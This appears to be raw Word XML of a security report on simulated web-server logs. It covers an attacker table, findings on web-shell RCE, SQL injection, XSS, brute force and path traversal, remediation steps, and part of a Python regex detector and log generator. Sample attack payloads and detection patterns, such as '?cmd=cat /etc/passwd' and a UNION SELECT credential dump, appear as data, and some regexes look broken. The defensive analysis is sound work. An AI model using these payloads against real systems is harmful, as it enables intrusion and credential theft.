          <w:rFonts w:ascii="Google Sans;sans-serif" w:hAnsi="Google Sans;sans-serif"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Attacks Analysis -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b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans;sans-serif" w:hAnsi="Google Sans;sans-serif"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 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440"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="3197"/>
        <w:gridCol w:w="2490"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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u w:val="single"/>
              </w:rPr>
              <w:t>Attacker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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u w:val="single"/>
              </w:rPr>
              <w:t>Primary Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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u w:val="single"/>
              </w:rPr>
              <w:t>Categories Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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u w:val="single"/>
              </w:rPr>
              <w:t>Highest Severity Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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10.0.0.45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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sqlmap/1.6.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
              </w:rPr>
              <w:t>, Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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SQLi, Web Shell RCE, XSS, Directory Traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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</w:rPr>
              <w:t>RCE (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
                <w:b/>
              </w:rPr>
              <w:t>200 OK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
                <w:b/>
              </w:rPr>
              <w:t>) &amp; SQLi (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
                <w:b/>
              </w:rPr>
              <w:t>200 OK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
                <w:b/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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10.0.0.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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Standard Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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Web Shell RCE, Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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</w:rPr>
              <w:t>RCE (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
                <w:b/>
              </w:rPr>
              <w:t>200 OK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
                <w:b/>
              </w:rPr>
              <w:t>) &amp; Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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172.16.0.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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sqlmap/1.6.0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Hydra/9.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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Recon, SQLi, Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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Active Exploitation Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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192.168.1.99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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Hydra/9.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
              </w:rPr>
              <w:t>, Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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Brute Force, Malicious XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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</w:rPr>
              <w:t>Successful Login (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
                <w:b/>
              </w:rPr>
              <w:t>200 OK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
                <w:b/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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  <w:t xml:space="preserve">Note :  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCE – Remote code Execution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 xml:space="preserve">XSS – Cross site scripting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Second Standalone Web dashbord with GeoIP Location - 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994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5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013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610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5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6100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Detecting suspicious patterns and Analysis from simulated web-server logs -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The web server logs indicate active exploitation and scanning targeting multiple vectors  - </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remote Code Execution (RCE via Web Shell) -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
        </w:rPr>
        <w:t>Source IP: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10.0.0.101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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
        </w:rPr>
        <w:t>Payload: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/uploads/avatar.php.png?cmd=cat%20/etc/passwd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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
        </w:rPr>
        <w:t>Status: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200 OK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/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="p-rc_3001bcfb31a9d919-37"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> High Severity. The attacker is successfully executing system commands via a double-extension web shell (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t>.php.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve">) uploaded to the static directory.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Cross-Site Scripting (XSS)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Source IPs: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192.168.1.99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10.0.0.101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Payloads:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags targeting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t>/comment.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> to exfiltrate session cookies (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t>document.cookie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Status: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200 OK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1" w:name="p-rc_3001bcfb31a9d919-38"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> Active session hijacking risk due to unencoded output.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SQL Injection (SQLi)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Source IP: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8.8.8.8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Payload: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/products/item.php?id=1' UNION SELECT 1,username,password FROM users--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Status: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200 OK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/>
        <w:ind w:hanging="283" w:start="709" w:end="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="p-rc_3001bcfb31a9d919-39"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> Database contents are exposed, allowing full credential leakage.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Automated Credential Brute-Forcing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Source IP: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172.16.0.5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Target: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/login.php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Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rapid sequence of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t>401 Unauthorized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> responses.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/>
        <w:ind w:hanging="283" w:start="709" w:end="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="p-rc_3001bcfb31a9d919-40"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> High-volume automated brute-force attack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Path Traversal Attempts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Source IP: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1.1.1.1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Payload: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/../../../../etc/passwd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Status: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403 Forbidden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/>
        <w:ind w:hanging="283" w:start="709" w:end="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="p-rc_3001bcfb31a9d919-41"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
        </w:rPr>
        <w:t xml:space="preserve"> Low immediately (blocked by server routing), but indicates active external reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Response Actions -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Contain Web Shell RCE:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Delete </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>avatar.php.png</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/uploads/</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and configure the web server (Apache/Nginx) to block execution of scripts inside </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/uploads/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Block Malicious IPs:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Immediately apply firewall rules to drop traffic from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>10.0.0.101</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>8.8.8.8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Patch SQLi:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Update </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/products/item.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Parameterized Queries </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>rather than concatenating SQL parameters.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 w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="p-rc_3001bcfb31a9d919-42"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sanitize Inputs:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Apply HTML entity encoding on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/comment.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> outputs to prevent script execution, and set the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> flag on all session cookies to mitigate cookie theft.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Python Script for log detection with code -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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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import re </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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import random </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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from datetime import datetime, timedelta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>THREAT DETECTION PATTERNS &amp; REGEX RULES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1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Standard Combined Log Format Regex: IP - - [Timestamp] "Method Path Protocol" Status Bytes "Referrer" "User-Agent"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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LOG_PATTERN = re.compile ( </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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r'(?P\S+) \S+ \S+ [(?P[\w/:]+ +\d{4})] "(?P\S+) (?P\S+) \S+" (?P\d{3}) (?P\d+) ".</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>?" "(?P.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>?)"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Rules for Common Web Attack Vectors - </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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SUSPICIOUS_RULES = { </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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"SQL Injection (SQLi)": re.compile ( </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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r"(union|select|insert|concat|or\s+1=1|--|'|"|drop\s+table)", re.IGNORECASE </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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), </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>"Directory Traversal": re.compile ( </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>r"(../|..\|etc/passwd|boot.ini|win.ini)", re.IGNORECASE </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>), </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>"Cross-Site Scripting (XSS)": re.compile ( </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>r"(&lt;script|javascript:|alert(|document.cookie|&lt;img\s+src=)", re.IGNORECASE </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>), </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>"Web Shell / RCE Execution": re.compile ( </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>r"(.php.png|?cmd=|/bin/sh|/bin/bash|whoami)", re.IGNORECASE </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>), </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>"Automated Vulnerability Scanner": re.compile ( </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>r"(sqlmap|nikto|nmap|hydra|gobuster|dirbuster|wpscan)", re.IGNORECASE </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SIMULATED LOG TRAFFIC GENERATOR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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>def generate_simulated_logs(output_file="access.log", count=30): </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>"""Generates a realistic access.log file with mixed benign and attack traffic."""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>benign_ips = ["192.168.1.15", "192.168.1.50", "10.0.0.12", "172.16.0.22"]</w:t>
        <w:br/>
        <w:t>attacker_ips = ["10.0.0.45", "172.16.0.5", "192.168.1.99", "10.0.0.101"]</w:t>
        <w:br/>
        <w:br/>
        <w:t>benign_paths = [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "/index.html", "/about.html", "/contact.php", </w:t>
        <w:br/>
        <w:t xml:space="preserve">    "/assets/style.css", "/images/logo.png", "/cart"</w:t>
        <w:br/>
        <w:t>]</w:t>
        <w:br/>
        <w:br/>
        <w:t>attack_payloads = [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ("/products/item.php?id=1%27%20OR%201=1--", "sqlmap/1.6.0"),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ("/../../../../etc/passwd", "Mozilla/5.0"),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ("/comment.php?msg=&lt;script&gt;alert(document.cookie)&lt;/script&gt;", "Mozilla/5.0"),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ("/uploads/avatar.php.png?cmd=whoami", "Mozilla/5.0"),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ("/admin.php?user=UNION%20SELECT%201,2,3--", "sqlmap/1.6.0"),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ("/login.php", "Hydra/9.2")</w:t>
        <w:br/>
